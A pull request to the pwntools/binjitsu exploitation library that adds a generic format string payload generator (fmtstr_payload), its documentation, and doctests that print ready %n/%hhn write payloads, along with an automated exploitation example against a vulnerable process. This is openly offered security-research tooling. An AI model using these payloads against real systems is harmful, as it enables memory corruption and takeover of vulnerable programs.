### PR TITLE
Format string documentation & generic function

### DIFF
--- a/docs/source/fmtstr.rst
+++ b/docs/source/fmtstr.rst
@@ -1,0 +1,10 @@
+.. .. testsetup:: *
+
+..    import os
+..    from pwnlib.testexample import add
+
+:mod:`pwnlib.fmtstr` --- Format string bug exploitation tools
+=============================================================
+
+.. automodule:: pwnlib.fmtstr
+   :members:

--- a/docs/source/fmtstr.rst
+++ b/docs/source/fmtstr.rst
@@ -1,7 +1,7 @@
-.. .. testsetup:: *
+.. testsetup:: *
 
-..    import os
-..    from pwnlib.testexample import add
+	from pwnlib.context import context
+	from pwnlib.fmtstr import *
 
 :mod:`pwnlib.fmtstr` --- Format string bug exploitation tools
 =============================================================

--- a/docs/source/fmtstr.rst
+++ b/docs/source/fmtstr.rst
@@ -1,7 +1,7 @@
 .. testsetup:: *
 
-	from pwnlib.context import context
-	from pwnlib.fmtstr import *
+	from pwn import *
+	import tempfile
 
 :mod:`pwnlib.fmtstr` --- Format string bug exploitation tools
 =============================================================

--- a/docs/source/index.rst
+++ b/docs/source/index.rst
@@ -37,6 +37,7 @@ Each of the ``binjitsu`` modules is documented here.
    encoders
    elf
    exception
+   fmtstr
    gdb
    log
    memleak

--- a/pwn/toplevel.py
+++ b/pwn/toplevel.py
@@ -22,7 +22,7 @@ from pwnlib.encoders import *
 from pwnlib.elf import ELF
 from pwnlib.elf import load
 from pwnlib.exception import PwnlibException
-from pwnlib.fmtstr import FmtStr
+from pwnlib.fmtstr import FmtStr, fmtstr_payload
 from pwnlib.log import getLogger
 from pwnlib.memleak import MemLeak
 from pwnlib.replacements import *

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -228,7 +228,7 @@ class FmtStr(object):
         self.writes = {}
 
     def write(self, addr, data):
-        """write(addr, data) -> None
+        r"""write(addr, data) -> None
 
         In order to tell : I want to write ``data`` at ``addr``.
 
@@ -238,6 +238,16 @@ class FmtStr(object):
 
         Returns:
             None
+
+        Examples:
+
+            >>> def send_fmt_payload(payload):
+            ...     print repr(payload)
+            ...
+            >>> f = FmtStr(send_fmt_payload, offset=5)
+            >>> f.write(0x08040506, 0x1337babe)
+            >>> f.execute_writes()
+            '\x06\x05\x04\x08\x07\x05\x04\x08\x08\x05\x04\x08\t\x05\x04\x08%174c%5$hhn%252c%6$hhn%125c%7$hhn%220c%8$hhn'
 
         """
         self.writes[addr] = data

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -122,8 +122,8 @@ def fmtstr_payload(offset, writes, numbwritten=0, write_size='byte'):
                 to_add = (current | (mask+1)) - (numbwritten & mask)
 
             if to_add != 0:
-                payload += "%%%dc" % to_add
-            payload += "%%%d$%sn" % (offset + fmtCount, formatz)
+                payload += "%{}c".format(to_add)
+            payload += "%{}${}n".format(offset + fmtCount, formatz)
 
             numbwritten += to_add
             what >>= decalage
@@ -176,7 +176,7 @@ class FmtStr(object):
         self.leaker = MemLeak(self._leaker)
 
     def leak_stack(self, offset, prefix=""):
-        leak = self.execute_fmt(prefix+"START%%%d$pEND" % offset)
+        leak = self.execute_fmt(prefix+"START%{}$pEND".format(offset))
         try:
             leak = re.findall(r"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]
             leak = int(leak, 16)

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -16,7 +16,7 @@ Examples:
     ...     "{",
     ...     "       char buff[1024];",
     ...     "       void *ptr = NULL;",
-    ...     "   int *my_var = TARGET;"
+    ...     "       int *my_var = TARGET;",
     ...     "       ptr = mmap(MEMORY_ADDRESS, MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);",
     ...     "       if(ptr != MEMORY_ADDRESS)",
     ...     "       {",
@@ -57,7 +57,6 @@ Example - Payload generation
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 
 ::
-    # TODO full example with gcc cf https://github.com/binjitsu/binjitsu/pull/41#discussion_r32895981
     # we want to do 3 writes
     writes = {0x08041337:   0xbfffffff,
               0x08041337+4: 0x1337babe,

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -17,7 +17,7 @@ Example - Payload generation
     # strcat(dest, your_input, 256);
     # printf(dest);
     # Here, numbwritten parameter must be 8
-    payload = fmtstr.make_payload(5, writes, numbwritten=8)
+    payload = fmtstr_payload(5, writes, numbwritten=8)
 
 Example - Automated exploitation
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
@@ -37,7 +37,7 @@ Example - Automated exploitation
 		return p.recv()
 
 	# Create a FmtStr object and give to him the function
-	format_string = fmtstr.FmtStr(execute_fmt=send_payload)
+	format_string = FmtStr(execute_fmt=send_payload)
 	format_string.write(0x0, 0x1337babe) # write 0x1337babe at 0x0
 	format_string.write(0x1337babe, 0x0) # write 0x0 at 0x1337babe
 	format_string.execute_writes()
@@ -54,8 +54,8 @@ from pwnlib.util.packing import *
 
 log = getLogger(__name__)
 
-def make_payload(offset, writes, numbwritten=0, write_size='byte'):
-    """make_payload(offset, writes, numbwritten=0, write_size='byte') -> str
+def fmtstr_payload(offset, writes, numbwritten=0, write_size='byte'):
+    """fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') -> str
 
     Makes payload with given parameter.
     It can generate payload for 32 or 64 bits architectures. 
@@ -72,17 +72,17 @@ def make_payload(offset, writes, numbwritten=0, write_size='byte'):
 
     Examples:
         >>> with context.local(arch = 'amd64'):
-        ...     print repr(fmtstr.make_payload(1, [(0x0, 0x1337babe)], write_size='int'))
-        ...     print repr(fmtstr.make_payload(1, [(0x0, 0x1337babe)], write_size='short'))
-        ...     print repr(fmtstr.make_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
+        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='int'))
+        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='short'))
+        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
         ... 
         '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00%322419374c%1$n%3972547906c%2$n'
         '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00%47774c%1$hn%22649c%2$hn%60617c%3$hn%4$hn'
         '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00%126c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn%237c%5$hhn%6$hhn%7$hhn%8$hhn'
         >>> with context.local(arch = 'i386'):
-        ...     print repr(fmtstr.make_payload(1, [(0x0, 0x1337babe)], write_size='int'))
-        ...     print repr(fmtstr.make_payload(1, [(0x0, 0x1337babe)], write_size='short'))
-        ...     print repr(fmtstr.make_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
+        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='int'))
+        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='short'))
+        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
         ... 
         '\\x00\\x00\\x00\\x00%322419386c%1$n'
         '\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00%47798c%1$hn%22649c%2$hn'
@@ -226,7 +226,7 @@ class FmtStr(object):
 
         """
         fmtstr = randoms(self.padlen)
-        fmtstr += make_payload(self.offset, self.writes, numbwritten=self.padlen, write_size='byte')
+        fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen, write_size='byte')
         self.execute_fmt(fmtstr)
         self.writes = []
 

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -137,26 +137,8 @@ class FmtStr(object):
         return leak
 
     def execute_writes(self):
-        addrs = []
-        bytes = []
-
-        #convert every write into single-byte writes
-        for addr, data in self.writes:
-            data = flat(data)
-            for off, b in enumerate(data):
-                addrs.append(addr+off)
-                bytes.append(u8(b))
-
-        fmtstr = randoms(self.padlen) + flat(addrs)
-        n = self.numbwritten + len(fmtstr)
-
-        for i, b in enumerate(bytes):
-            b -= (n % 256)
-            if b <= 0:
-                b += 256
-            fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i)
-            n += b
-
+        fmtstr = randoms(self.padlen)
+        fmtstr += make_payload(self.offset, self.writes, numbwritten=self.padlen, nformater=4)
         self.execute_fmt(fmtstr)
         self.writes = []
 

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -36,7 +36,7 @@ from pwnlib.util.packing import *
 
 log = getLogger(__name__)
 
-def make_payload(offset, where, what, numbwritten=0, nformater=4):
+def make_payload(offset, writes, numbwritten=0, nformater=4):
     """
     make the payload needed
     offset is the number of the formatter
@@ -46,34 +46,37 @@ def make_payload(offset, where, what, numbwritten=0, nformater=4):
     nformater is the number of formatter needed, must be 1, 2 or 4
     """
 
-    if where > 0xFFFFFFFF or what > 0xFFFFFFFF or context.bits != 32:
-        log.error("can only build 32bits arch payload...")
+    for where, what in writes:
+        if where > 0xFFFFFFFF or what > 0xFFFFFFFF or context.bits != 32:
+            log.error("can only build 32bits arch payload...")
 
     if nformater not in [1, 2, 4]:
         log.error("nformater must be 1, 2 or 4")
 
-    # add where
+    # add wheres
     payload = ""
-    for i in range(0, 4, 4/nformater):
-        payload += pack(where+i)
+    for where, what in writes:
+        for i in range(0, 4, 4/nformater):
+            payload += pack(where+i)
 
     numbwritten += len(payload)
     mask = int(4/nformater * "FF", 16)
     fmtCount = 0
-    for i in range(0, 4, 4/nformater):
-        current = what & mask
-        if numbwritten & mask <= current:
-            to_add = current - (numbwritten & mask)
-        else:
-            to_add = (current | (mask+1)) - (numbwritten & mask)
+    for where, what in writes:
+        for i in range(0, 4, 4/nformater):
+            current = what & mask
+            if numbwritten & mask <= current:
+                to_add = current - (numbwritten & mask)
+            else:
+                to_add = (current | (mask+1)) - (numbwritten & mask)
 
-        if to_add != 0:
-            payload += "%%%dc" % to_add
-        payload += "%%%d$%sn" % (offset + fmtCount, nformater/2 * "h")
+            if to_add != 0:
+                payload += "%%%dc" % to_add
+            payload += "%%%d$%sn" % (offset + fmtCount, nformater/2 * "h")
 
-        numbwritten += to_add
-        what >>= 4/nformater*8
-        fmtCount += 1
+            numbwritten += to_add
+            what >>= 4/nformater*8
+            fmtCount += 1
 
     return payload
 

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -71,21 +71,19 @@ def fmtstr_payload(offset, writes, numbwritten=0, write_size='byte'):
         The payload in order to do needed writes
 
     Examples:
-        >>> with context.local(arch = 'amd64'):
-        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='int'))
-        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='short'))
-        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
-        ... 
+        >>> context.clear(arch = 'amd64')
+        >>> print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='int'))
         '\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00%322419374c%1$n%3972547906c%2$n'
+        >>> print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='short'))
         '\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00%47774c%1$hn%22649c%2$hn%60617c%3$hn%4$hn'
+        >>> print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
         '\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00%126c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn%237c%5$hhn%6$hhn%7$hhn%8$hhn'
-        >>> with context.local(arch = 'i386'):
-        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='int'))
-        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='short'))
-        ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
-        ... 
+        >>> context.clear(arch = 'i386')
+        >>> print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='int'))
         '\x00\x00\x00\x00%322419386c%1$n'
+        >>> print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='short'))
         '\x00\x00\x00\x00\x02\x00\x00\x00%47798c%1$hn%22649c%2$hn'
+        >>> print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
         '\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00%174c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn'
 
     """

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -1,3 +1,30 @@
+"""
+Provide some tools to exploit format string bug
+
+Example - Automated exploitation
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+::
+
+	# Assume a process that reads a string
+	# and gives this string as the first argument
+	# of a printf() call
+	# It do this indefinitely
+	p = process('./vulnerable')
+
+	# Function called in order to send a payload
+	def send_payload(payload):
+		log.info("payload = %s" % repr(payload))
+		p.sendline(payload)
+		return p.recv()
+
+	# Create a FmtStr object and give to him the function
+	format_string = fmtstr.FmtStr(execute_fmt=send_payload)
+	format_string.write(0x0, 0x1337babe) # write 0x1337babe at 0x0
+	format_string.write(0x1337babe, 0x0) # write 0x0 at 0x1337babe
+	format_string.execute_writes()
+
+"""
 import logging
 import re
 

--- a/pwnlib/fmtstr.py
+++ b/pwnlib/fmtstr.py
@@ -55,7 +55,7 @@ from pwnlib.util.packing import *
 log = getLogger(__name__)
 
 def fmtstr_payload(offset, writes, numbwritten=0, write_size='byte'):
-    """fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') -> str
+    r"""fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') -> str
 
     Makes payload with given parameter.
     It can generate payload for 32 or 64 bits architectures. 
@@ -76,17 +76,17 @@ def fmtstr_payload(offset, writes, numbwritten=0, write_size='byte'):
         ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='short'))
         ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
         ... 
-        '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00%322419374c%1$n%3972547906c%2$n'
-        '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00%47774c%1$hn%22649c%2$hn%60617c%3$hn%4$hn'
-        '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00%126c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn%237c%5$hhn%6$hhn%7$hhn%8$hhn'
+        '\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00%322419374c%1$n%3972547906c%2$n'
+        '\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00%47774c%1$hn%22649c%2$hn%60617c%3$hn%4$hn'
+        '\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00%126c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn%237c%5$hhn%6$hhn%7$hhn%8$hhn'
         >>> with context.local(arch = 'i386'):
         ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='int'))
         ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='short'))
         ...     print repr(fmtstr_payload(1, [(0x0, 0x1337babe)], write_size='byte'))
         ... 
-        '\\x00\\x00\\x00\\x00%322419386c%1$n'
-        '\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00%47798c%1$hn%22649c%2$hn'
-        '\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x00\\x00%174c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn'
+        '\x00\x00\x00\x00%322419386c%1$n'
+        '\x00\x00\x00\x00\x02\x00\x00\x00%47798c%1$hn%22649c%2$hn'
+        '\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00%174c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn'
 
     """
 

--- a/pwnlib/tubes/listen.py
+++ b/pwnlib/tubes/listen.py
@@ -29,12 +29,14 @@ class listen(sock):
         super(listen, self).__init__(timeout, level = level)
 
         port = int(port)
+        fam  = {socket.AF_INET: 'ipv4',
+                socket.AF_INET6: 'ipv6'}.get(fam, fam)
 
         if fam == 'any':
             fam = socket.AF_UNSPEC
-        elif fam == 4 or fam.lower() in ['ipv4', 'ip4', 'v4', '4']:
+        elif fam.lower() in ['ipv4', 'ip4', 'v4', '4']:
             fam = socket.AF_INET
-        elif fam == 6 or fam.lower() in ['ipv6', 'ip6', 'v6', '6']:
+        elif fam.lower() in ['ipv6', 'ip6', 'v6', '6']:
             fam = socket.AF_INET6
             if bindaddr == '0.0.0.0':
                 bindaddr = '::'

--- a/pwnlib/tubes/process.py
+++ b/pwnlib/tubes/process.py
@@ -57,7 +57,7 @@ class process(tube):
 
     Examples:
 
-        >>> p = process(which('python2'))
+        >>> p = process('python2')
         >>> p.sendline("print 'Hello world'")
         >>> p.sendline("print 'Wow, such data'");
         >>> '' == p.recv(timeout=0.01)


### PR DESCRIPTION
I added a generic function which generate format string bug payload. It takes some parameters : 
* ```offset``` : the first formatter's offfset you control
* ```ok``` : list of tuple, each tuple must be composed as ```(where, what)```
* ```numbwritten``` : number of byte already written by the printf function
* ```write_size``` : must be 'byte', 'short', 'int'. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
The function takes ```context.bits``` value in reference for generating the payload. It supports 32 bits or 64 bits architectures.

I also added some documentation. 

I have some issues with travis on archlinux, so there is no tests for this functions for the moment.
